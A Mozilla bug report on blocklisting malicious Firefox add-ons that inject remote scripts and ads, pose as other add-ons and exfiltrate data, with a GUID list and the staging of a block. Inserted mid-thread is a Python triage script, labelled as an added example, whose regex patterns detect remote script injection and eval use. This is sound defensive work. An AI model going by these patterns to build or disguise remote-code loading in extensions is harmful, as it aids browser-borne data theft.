Closed Bug 1514865 Opened 5 years ago Closed 5 years ago

Blocklist malicious add-ons injecting ads

Categories

(Toolkit :: Blocklist Policy Requests, enhancement)

RESOLVED FIXED

People

(Reporter: rctgamer3, Assigned: Fallen)

Details

These add-ons are installed from hard-to-escape .cool TLD domains. These add-ons have remote script injection. Functions include ad injection from different networks and more.

{8ec160b7-1089-4944-a999-a1d6afa71c5d}
{223a1503-772d-45eb-8cb8-e2e49563703d}

Probably similar ones floating around.
Philipp, can you look into these?

+---------+----------------------------------------+-------------------+
| id      | guid                                   | Name              |
+---------+----------------------------------------+-------------------+
| 1014280 | {223a1503-772d-45eb-8cb8-e2e49563703d} | Logitech SetPoint |
| 1016222 | {8ec160b7-1089-4944-a999-a1d6afa71c5d} | stationery        |
| 1016394 | {cfacacd6-191c-46c4-b78c-8a48289b2829} | stationery        |
| 1016395 | {1155e72f-2b21-433f-ba9a-5af6ed40c8ee} | triggerer         |
| 1016396 | {583910bd-759f-40f6-b96a-1d678d65650f} | PredictionR       |
+---------+----------------------------------------+-------------------+
Flags: needinfo?(philipp)
I found a bunch of other add-ons using .cool domains that have potential for being similar. I'm running a query for more of them which should be through tomorrow morning.

The ones you posted are definitely affected, they inject remote scripts and mask as other add-ons. Inspecting the remote scripts, they seem to inject content scripts into all urls that exfiltrate data.
Assignee: nobody → philipp
Status: NEW → ASSIGNED
Flags: needinfo?(philipp)
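The traits named in this bug (content scripts matched against all URLs, script loaded from a remote host, installation from a .cool domain) can be checked mechanically when triaging an unpacked add-on. The sketch below is an added example, not part of the original bug comments or of Mozilla's review tooling; `triage_addon`, the regex heuristics and the sample manifest, source and URL are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Match patterns that place a content script on every page.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Heuristics (assumptions, not an exhaustive list) for code pulled in at runtime
# rather than shipped inside the reviewed package.
REMOTE_CODE_PATTERNS = {
    "remote <script> element": re.compile(
        r"createElement\(\s*['\"]script['\"]\s*\)[\s\S]{0,300}?\.src\s*=\s*['\"](?:https?:)?//"),
    "dynamic evaluation": re.compile(r"\b(?:eval|Function)\s*\("),
}

def triage_addon(manifest, sources, install_url=None):
    """Return a list of (finding, detail) tuples for one unpacked add-on.

    manifest: parsed manifest.json; sources: {path: JavaScript text};
    install_url: where the XPI was fetched from, if known.
    """
    findings = []
    for entry in manifest.get("content_scripts", []):
        broad = BROAD_MATCHES.intersection(entry.get("matches", []))
        if broad:
            findings.append(("broad content script", ", ".join(sorted(broad))))
    for path, text in sources.items():
        for label, pattern in REMOTE_CODE_PATTERNS.items():
            if pattern.search(text):
                findings.append((label, path))
    if install_url:
        host = urlparse(install_url).hostname or ""
        if host.endswith(".cool"):
            findings.append(("installed from .cool domain", host))
    return findings

# Constructed sample input; none of these names or hosts come from the bug.
SAMPLE_MANIFEST = {
    "name": "Example Helper",
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
}
SAMPLE_SOURCES = {
    "content.js": "var s = document.createElement('script');\n"
                  "s.src = 'https://cdn.example.invalid/a.js';\n"
                  "document.head.appendChild(s);",
    "options.js": "document.title = 'Options';",
}
SAMPLE_INSTALL_URL = "https://addons.example.cool/helper.xpi"

if __name__ == "__main__":
    for finding in triage_addon(SAMPLE_MANIFEST, SAMPLE_SOURCES, SAMPLE_INSTALL_URL):
        print(finding)
```

Obfuscated payloads will not match these literal patterns, so a clean result only means the obvious forms are absent.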
Most interesting piece of code I found while looking at these: ゚ω゚ノ= /`m´)ノ ~┻━┻  . I learned about two new obfuscators in the process.

The add-ons all have a remote script injection and exfiltrate data, some are obfuscated in different ways.
I found a total of 241 add-ons, many of which are already blocked. Here is the remaining list:

The block is staged. Jorge, can you review?
Flags: needinfo?(jorge)
Done, thanks.
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(jorge)
Resolution: --- → FIXED